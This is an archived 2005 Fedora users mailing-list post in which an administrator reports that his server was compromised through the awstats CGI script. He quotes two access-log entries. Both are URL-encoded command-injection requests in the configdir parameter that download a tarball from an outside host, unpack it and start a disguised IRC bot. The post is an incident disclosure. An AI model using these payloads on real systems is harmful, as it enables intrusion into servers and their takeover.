Security Breach

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

To: For users of Fedora Core releases <fedora-list@xxxxxxxxxx>
Subject: Security Breach
From: Chris Strzelczyk <cstrzelczyk@xxxxxxxxxxxxxxxxxxx>
Date: Fri, 4 Mar 2005 11:40:18 -0500
List-archive: <https://www.redhat.com/archives/fedora-list>
List-help: <mailto:[email protected]?subject=help>
List-id: For users of Fedora Core releases <fedora-list.redhat.com>
List-post: <mailto:[email protected]>
List-subscribe: <http://www.redhat.com/mailman/listinfo/fedora-list>, <mailto:[email protected]?subject=subscribe>
List-unsubscribe: <http://www.redhat.com/mailman/listinfo/fedora-list>, <mailto:[email protected]?subject=unsubscribe>
Reply-to: For users of Fedora Core releases <fedora-list@xxxxxxxxxx>

Hey guys,

I just though I would let you know how my server got compromised. This even happend after I installed the new version of awstats on Wednesday. So in short I don't know if it is OK to run awstats as a cgi executable.

These are from my access log:

"GET /cgi-bin/awstats.pl? configdir=%7cecho%20%3becho%20b_exp%3bcd%20%2ftmp%3bcurl%20%2d0%20wget%2 0zburchi%2eidilis%2ero%2fbadboy%2etar%2egz%3btar%20%2dzxvf%20badboy%2eta r%2egz%3bcd%20psybnc%3bmv%20mech%20crond%3bexport%20PATH%3d%3bcrond%3bec ho%20e_exp%3b%2500 HTTP/1.1" 200 485 "-" "-"

"GET /cgi-bin/awstats.pl? configdir=%7cecho%20%3becho%20b_exp%3bcd%20%2ftmp%3bwget%20zburchi%2eidi lis%2ero%2fbadboy%2etar%2egz%3btar%20%2dzxvf%20badboy%2etar%2egz%3bcd%20 psybnc%3bmv%20mech%20crond%3bexport%20PATH%3d%3bcrond%3becho%20e_exp%3b% 2500 HTTP/1.1" 200 634 "-" "-"

-cs

Follow-Ups:
- Re: Security Breach
  - From: Alexander Dalloz

Prev by Date: Re: Hardware Requirements
Next by Date: Re: Hardware Requirements
Previous by thread: Tripwire Questions
Next by thread: Re: Security Breach
Index(es):
- Date
- Thread

[Index of Archives] [Current Fedora Users] [Fedora Desktop] [Fedora SELinux] [Yosemite News] [Yosemite Photos] [KDE Users] [Fedora Tools] [Fedora Docs]

Powered by Linux